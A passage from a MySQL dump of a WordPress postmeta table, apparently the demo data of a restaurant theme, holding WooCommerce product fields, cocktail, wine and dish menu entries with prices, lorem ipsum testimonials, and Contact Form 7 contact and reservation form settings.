{s:10:\"vc_grid_id\";a:0:{}}'),(48963,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48964,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48965,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48966,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48967,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48968,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48969,3124,'mkdf_show_new_sign_woo_meta','yes'),(48970,3124,'slide_template','default'),(48971,3124,'_wpb_vc_js_status','false'),(48972,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48973,3125,'_sku','PR0038'),(48974,3125,'_regular_price','185'),(48975,3125,'_sale_price','120'),(48976,3125,'_sale_price_dates_from',''),(48977,3125,'_sale_price_dates_to',''),(48978,3125,'total_sales','0'),(48979,3125,'_tax_status','taxable'),(48980,3125,'_tax_class',''),(48981,3125,'_manage_stock','no'),(48982,3125,'_backorders','no'),(48983,3125,'_sold_individually','no'),(48984,3125,'_weight','185'),(48985,3125,'_length',''),(48986,3125,'_width',''),(48987,3125,'_height',''),(48988,3125,'_upsell_ids','a:0:{}'),(48989,3125,'_crosssell_ids','a:0:{}'),(48990,3125,'_purchase_note',''),(48991,3125,'_default_attributes','a:0:{}'),(48992,3125,'_virtual','no'),(48993,3125,'_downloadable','no'),(48994,3125,'_product_image_gallery',''),(48995,3125,'_download_limit','-1'),(48996,3125,'_download_expiry','-1'),(48997,3125,'_thumbnail_id','535'),(48998,3125,'_stock',''),(48999,3125,'_stock_status','instock'),(49000,3125,'_wc_average_rating','3.50'),(49001,3125,'_wc_rating_count','a:2:{i:3;i:1;i:4;i:1;}'),(49002,3125,'_wc_review_count','2'),(49003,3125,'_downloadable_files','a:0:{}'),(49004,3125,'_product_attributes','a:0:{}'),(49005,3125,'_product_version','3.4.3'),(49006,3125,'_price','120'),(49007,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49008,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49009,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49010,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49011,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49012,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49013,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49014,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49015,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49016,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49017,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49018,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49019,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49020,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49021,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49022,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49023,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49024,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49025,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49026,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49027,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49028,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49029,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49030,3125,'mkdf_show_new_sign_woo_meta','no'),(49031,3125,'slide_template','default'),(49032,3125,'_wpb_vc_js_status','false'),(49033,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49034,3126,'_sku','PR0039'),(49035,3126,'_regular_price','200'),(49036,3126,'_sale_price',''),(49037,3126,'_sale_price_dates_from',''),(49038,3126,'_sale_price_dates_to',''),(49039,3126,'total_sales','0'),(49040,3126,'_tax_status','taxable'),(49041,3126,'_tax_class',''),(49042,3126,'_manage_stock','no'),(49043,3126,'_backorders','no'),(49044,3126,'_sold_individually','no'),(49045,3126,'_weight','185'),(49046,3126,'_length',''),(49047,3126,'_width',''),(49048,3126,'_height',''),(49049,3126,'_upsell_ids','a:0:{}'),(49050,3126,'_crosssell_ids','a:0:{}'),(49051,3126,'_purchase_note',''),(49052,3126,'_default_attributes','a:0:{}'),(49053,3126,'_virtual','no'),(49054,3126,'_downloadable','no'),(49055,3126,'_product_image_gallery',''),(49056,3126,'_download_limit','-1'),(49057,3126,'_download_expiry','-1'),(52077,4352,'_menu_item_xfn',''),(49059,3126,'_stock',''),(49060,3126,'_stock_status','instock'),(49061,3126,'_wc_average_rating','0'),(49062,3126,'_wc_rating_count','a:0:{}'),(49063,3126,'_wc_review_count','0'),(49064,3126,'_downloadable_files','a:0:{}'),(49065,3126,'_product_attributes','a:0:{}'),(49066,3126,'_product_version','3.4.3'),(49067,3126,'_price','200'),(49068,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49069,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49070,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49071,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49072,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49073,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49074,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49075,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49076,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49077,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49078,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49079,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49080,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49081,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49082,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49083,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49084,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49085,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49086,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49087,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49088,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49089,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49090,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49091,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49092,3126,'mkdf_show_new_sign_woo_meta','no'),(49093,3126,'slide_template','default'),(49094,3126,'_wpb_vc_js_status','false'),(49095,3127,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49096,3127,'restaurant_menu_item_price','20'),(49097,3127,'restaurant_menu_item_description','Rye, genever, demerara, and green chartreuse'),(49098,3127,'slide_template','default'),(49099,3127,'restaurant_menu_item_label','1'),(49100,3128,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49101,3128,'restaurant_menu_item_price','30$'),(49102,3128,'restaurant_menu_item_description','Scotch, cranberry grenadine, lemon, and gilka kummel'),(49103,3128,'restaurant_menu_item_label','2'),(49104,3128,'slide_template','default'),(49105,3129,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49106,3129,'restaurant_menu_item_price','26$');
INSERT INTO `wp_postmeta` VALUES (49107,3129,'restaurant_menu_item_description','Pineapple rum, sweet vermouth, amaro lucano, and saline'),(49108,3129,'restaurant_menu_item_label','3'),(49109,3129,'slide_template','default'),(49110,3130,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49111,3130,'restaurant_menu_item_price','50$'),(49112,3130,'restaurant_menu_item_description','Gins, Elske tonic syrup, and lime'),(49113,3130,'slide_template','default'),(49114,3131,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49115,3131,'restaurant_menu_item_price','15$'),(49116,3131,'restaurant_menu_item_description','Gins, Elske tonic syrup, and lime'),(49117,3131,'slide_template','default'),(49118,3132,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49119,3132,'restaurant_menu_item_price','10$'),(49120,3132,'restaurant_menu_item_description','Sweet vermouth, amaro lucano, and saline'),(49121,3132,'slide_template','default'),(49122,3133,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49123,3133,'restaurant_menu_item_price','30$'),(49124,3133,'restaurant_menu_item_description','Pineapple rum, sweet vermouth, amaro lucano, and saline'),(49125,3133,'slide_template','default'),(49126,3134,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49127,3134,'restaurant_menu_item_price','35$'),(49128,3134,'restaurant_menu_item_description','Gins, Elske tonic syrup, and lime'),(49129,3134,'slide_template','default'),(49130,3135,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49131,3135,'restaurant_menu_item_price','50$'),(49132,3135,'restaurant_menu_item_description','France (Champagne) Chardonnay, Pinot Noir'),(49133,3135,'slide_template','default'),(49134,3136,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49135,3136,'restaurant_menu_item_price','20$'),(49136,3136,'restaurant_menu_item_description','France (Provence) Cinsault, Grenache France (Provence) Cinsault, Grenache'),(49137,3136,'slide_template','default'),(49138,3137,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49139,3137,'restaurant_menu_item_price','50$'),(49140,3137,'restaurant_menu_item_description','France (Loire) Sauvignon Blanc France (Loire) Sauvignon Blanc'),(49141,3137,'slide_template','default'),(49142,3138,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49143,3138,'restaurant_menu_item_price','70$'),(49144,3138,'restaurant_menu_item_description','Portugal (Douro) Rabigato, Codéga de LarinhoFrance (Provence) Cinsault'),(49145,3138,'slide_template','default'),(49146,3139,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49147,3139,'restaurant_menu_item_price','30$'),(49148,3139,'restaurant_menu_item_description','France (Burgundy) Chardonnay'),(49149,3139,'slide_template','default'),(49150,3140,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49151,3140,'restaurant_menu_item_price','20$'),(49152,3140,'restaurant_menu_item_description','France (Champagne) Chardonnay, Pinot Noir'),(49153,3140,'slide_template','default'),(49154,3141,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49155,3141,'restaurant_menu_item_price','70$'),(49156,3141,'restaurant_menu_item_description','France (Provence) Cinsault'),(49157,3141,'slide_template','default'),(49158,3142,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49159,3142,'restaurant_menu_item_price','20$'),(49160,3142,'restaurant_menu_item_description','France (Loire)'),(49161,3142,'slide_template','default'),(49162,3143,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49163,3143,'restaurant_menu_item_price','80$'),(49164,3143,'restaurant_menu_item_description','Portugal (Douro) Rabigato'),(49165,3143,'slide_template','default'),(49166,3144,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49167,3144,'restaurant_menu_item_price','50$'),(49168,3144,'restaurant_menu_item_description','Ground cumin, avocados, peeled and cubed'),(49169,3144,'slide_template','default'),(49170,3145,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49171,3145,'restaurant_menu_item_price','30$'),(49172,3145,'restaurant_menu_item_description','Fresh goat cheese, garlic cloves, minced'),(49173,3145,'slide_template','default'),(49174,3146,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49175,3146,'restaurant_menu_item_price','70$'),(49176,3146,'restaurant_menu_item_description','Garbanzo beans or chickpeas, rinsed and drained'),(49177,3146,'slide_template','default'),(49178,3147,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49179,3147,'restaurant_menu_item_price','50$'),(49180,3147,'restaurant_menu_item_description','Marinated artichoke hearts'),(49181,3147,'slide_template','default'),(49182,3148,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49183,3148,'restaurant_menu_item_price','30$'),(49184,3148,'restaurant_menu_item_description','Spreadable cream cheese, crumbled blue cheese'),(49185,3148,'slide_template','default'),(49186,3149,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49187,3149,'restaurant_menu_item_price','20$'),(49188,3149,'restaurant_menu_item_description','French bread baguette, cooked ham, potato salad'),(49189,3149,'slide_template','default'),(49190,3150,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49191,3150,'restaurant_menu_item_price','10$'),(49192,3150,'restaurant_menu_item_description','Cream cheese, softened, butter, brown sugar'),(49193,3150,'slide_template','default'),(49194,3151,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49195,3151,'restaurant_menu_item_price','30$'),(49196,3151,'restaurant_menu_item_description','Cherry-size fresh mozzarella cheese balls'),(49197,3151,'slide_template','default'),(49198,1346,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49199,1346,'restaurant_menu_item_price','50$'),(49200,1346,'restaurant_menu_item_description','Hummus, Greek olives, feta cheese'),(49201,1346,'slide_template','default'),(49202,3152,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49203,3152,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(49204,3152,'mkdf_testimonial_author','anthony johnston'),(49205,3152,'mkdf_testimonial_author_position','guest'),(49206,3152,'slide_template','default'),(49207,3153,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49208,3153,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(49209,3153,'mkdf_testimonial_author','Ruby Anderson'),(49210,3153,'mkdf_testimonial_author_position','guest'),(49211,3153,'slide_template','default'),(49212,603,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49213,603,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(49214,603,'mkdf_testimonial_author','Isabella Lee'),(49215,603,'mkdf_testimonial_author_position','guest'),(49216,603,'slide_template','default'),(49217,1348,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49218,1348,'restaurant_menu_item_price','8$'),(49219,1348,'restaurant_menu_item_description','Corona, Corona Light, Modelo Light & Modelo Especial'),(49220,1348,'slide_template','default'),(49221,1349,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49222,1349,'restaurant_menu_item_price','9$'),(49223,1349,'restaurant_menu_item_description','Budweiser or Bud Light. Florida only.'),(49224,1349,'slide_template','default'),(49225,1350,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49226,1350,'restaurant_menu_item_price','120$'),(49227,1350,'restaurant_menu_item_description','Argentina'),(49228,1350,'slide_template','default'),(49229,1351,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49230,1351,'restaurant_menu_item_price','150$'),(49231,1351,'restaurant_menu_item_description','WA'),(49232,1351,'slide_template','default'),(49233,1352,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49234,1352,'restaurant_menu_item_price','170$'),(49235,1352,'restaurant_menu_item_description','Stag\'s Leap Wine Cellars, Napa Valley'),(49236,1352,'slide_template','default'),(49237,1353,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49238,1353,'restaurant_menu_item_price','120$'),(49239,1353,'restaurant_menu_item_description','Cavit, Italy'),(49240,1353,'slide_template','default'),(49241,1354,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49242,1354,'restaurant_menu_item_price','70$'),(49243,1354,'restaurant_menu_item_description','Chateau Ste. Michelle, WA'),(49244,1354,'slide_template','default'),(49245,1355,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49246,1355,'restaurant_menu_item_price','20$'),(49247,1355,'restaurant_menu_item_description','Pusser\'s Rum & orange juice with a touch of pina colada mix.'),(49248,1355,'slide_template','default'),(49249,1356,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49250,1356,'restaurant_menu_item_price','12$'),(49251,1356,'restaurant_menu_item_description','Grey Goose Vodka, fresh squeezed lime juice'),(49252,1356,'slide_template','default'),(49253,1357,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49254,1357,'restaurant_menu_item_price','15$'),(49255,1357,'restaurant_menu_item_description','Fireball Cinnamon Whisky & RumChata.'),(49256,1357,'slide_template','default'),(49257,1358,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49258,1358,'restaurant_menu_item_price','9$'),(49259,1358,'restaurant_menu_item_description','Cruzan Single Barrel Rum, blackberry, banana and berry flavors.'),(49260,1358,'slide_template','default'),(49261,1360,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49262,1360,'restaurant_menu_item_price','7$'),(49263,1360,'restaurant_menu_item_description','The traditional cuban cocktail combination. Refreshing lime and mint leaves. Made with Cruzan Light Rum.'),(49264,1360,'slide_template','default'),(49265,1361,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49266,1361,'restaurant_menu_item_price','8$'),(49267,1361,'restaurant_menu_item_description','Smirnoff Vodka, Sauza Blue Tequila, Myer\'s Platinum, Gin, Blue Curocoo, Sour Mix and Sierra Mist'),(49268,1361,'slide_template','default'),(49269,1362,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49270,1362,'restaurant_menu_item_price','7$'),(49271,1362,'restaurant_menu_item_description','Made with Sauza Blue Tequila, watermelon and margarita mix. Topped with fresh watermelon and limes.'),(49272,1362,'slide_template','default'),(49273,1363,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49274,1363,'restaurant_menu_item_price','5$'),(49275,1363,'restaurant_menu_item_description','Cruzan Rum, Fresh Mint and Sierra Mist.'),(49276,1363,'slide_template','default'),(49277,2904,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49278,2904,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(49279,2904,'mkdf_testimonial_author','anthony johnston'),(49280,2904,'mkdf_testimonial_author_position','guest'),(49281,2904,'slide_template','default'),(49282,2906,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49283,2906,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(49284,2906,'mkdf_testimonial_author','anthony johnston'),(49285,2906,'mkdf_testimonial_author_position','guest'),(49286,2906,'slide_template','default'),(49287,3154,'_form','<label> Your Name (required)\n    [text* your-name] </label>\n\n<label> Your Email (required)\n    [email* your-email] </label>\n\n<label> Subject\n    [text your-subject] </label>\n\n<label> Your Message\n    [textarea your-message] </label>\n\n[submit \"Send\"]'),(49288,3154,'_mail','a:8:{s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:48:\"[your-name] <wordpress@attika.mikado-themes.com>\";s:4:\"body\";s:176:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:9:\"recipient\";s:25:\"support@mikado-themes.com\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(49289,3154,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:43:\"Attika <wordpress@attika.mikado-themes.com>\";s:4:\"body\";s:118:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:35:\"Reply-To: support@mikado-themes.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(49290,3154,'_messages','a:8:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";}'),(49291,3154,'_additional_settings',''),(49292,3154,'_locale','en_US'),(49293,3155,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49294,3155,'_form','<div class=\"mkdf-cf7-rf\">\n<label> Event name:[text* event-name]</label><div class=\"mkdf-cf7-rf-date\">\n<label> Event date:[date* your-date min:2018-08-01 max:2050-12-31 class:required \"2018-08-01\"]</label><label> Start time:[time* time-938 time-format:HH:mm min-hour:00-00 max-hour:24*00 step-hour:1]</label><label> End time:[time* time-624 time-format:HH:mm] </label>\n</div>\n[checkbox checkbox-201 \"I/We have flexible date\"]\n<div class=\"mkdf-cf7-rf-guests\">\n<label> Guests:[text* guests] </label><label> Budget:[text* budget]</label><p>[radio radio-653 class:guests label_first default:1 \"Total\" \"Per person\" ]</p>\n</div>\n<label> Contact name:[text* contact-name] </label>\n<div class=\"mkdf-cf7-rf-2-col\">\n<label> Company (optional):[text company-name] </label><label>Industry (optional):[text industry-name]</label>\n</div>\n<div class=\"mkdf-cf7-rf-2-col\">\n<label> Email:[email* your-email] </label><label>Phone:[text* phone-number]</label>\n</div>\n<div class=\"mkdf-cf7-rf-msg\">\n<label> Tell us more about event (optional):\n[textarea your-message] </label>\n</div>\n<div class=\"mkdf-cf7-rf-btn\">\n<div class=\"mkdf-cf7-rf-btn-inner\">\n[submit \"Send Reservation\"]\n</div>\n</div>\n</div>'),(49295,3155,'_mail','a:9:{s:6:\"active\";b:1;s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:48:\"[your-name] <wordpress@attika.mikado-themes.com>\";s:9:\"recipient\";s:25:\"support@mikado-themes.com\";s:4:\"body\";s:176:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(49296,3155,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:43:\"Attika <wordpress@attika.mikado-themes.com>\";s:9:\"recipient\";s:12:\"[your-email]\";s:4:\"body\";s:118:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:18:\"additional_headers\";s:35:\"Reply-To: support@mikado-themes.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(49297,3155,'_messages','a:23:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:20:\"The file is too big.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";s:14:\"invalid_number\";s:29:\"The number format is invalid.\";s:16:\"number_too_small\";s:47:\"The number is smaller than the minimum allowed.\";s:16:\"number_too_large\";s:46:\"The number is larger than the maximum allowed.\";s:23:\"quiz_answer_not_correct\";s:36:\"The answer to the quiz is incorrect.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:13:\"invalid_email\";s:38:\"The e-mail address entered is invalid.\";s:11:\"invalid_url\";s:19:\"The URL is invalid.\";s:11:\"invalid_tel\";s:32:\"The telephone number is invalid.\";s:16:\"invalid_datetime\";s:31:\"Invalid date and time supplied.\";s:12:\"invalid_date\";s:29:\"The date format is incorrect.\";s:12:\"invalid_time\";s:22:\"Invalid time supplied.\";}'),(49298,3155,'_additional_settings',''),(49299,3155,'_locale','en_US'),(49300,2905,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49301,2905,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(49302,2905,'mkdf_testimonial_author','Isabella Lee'),(49303,2905,'mkdf_testimonial_author_position','guest'),(49304,2905,'slide_template','default'),(49305,4038,'_menu_item_type','post_type'),(49306,4038,'_menu_item_menu_item_parent','3989'),(49307,4038,'_menu_item_object_id','3040'),(49308,4038,'_menu_item_object','page'),(49309,4038,'_menu_item_target',''),(49310,4038,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49311,4038,'_menu_item_xfn',''),(49312,4038,'_menu_item_url',''),(49313,4038,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49314,4038,'_menu_item_icon','null'),(49315,4039,'_menu_item_type','post_type'),(49316,4039,'_menu_item_menu_item_parent','3992'),(49317,4039,'_menu_item_object_id','3034'),(49318,4039,'_menu_item_object','page'),(49319,4039,'_menu_item_target',''),(49320,4039,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49321,4039,'_menu_item_xfn',''),(49322,4039,'_menu_item_url',''),(49323,4039,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49324,4039,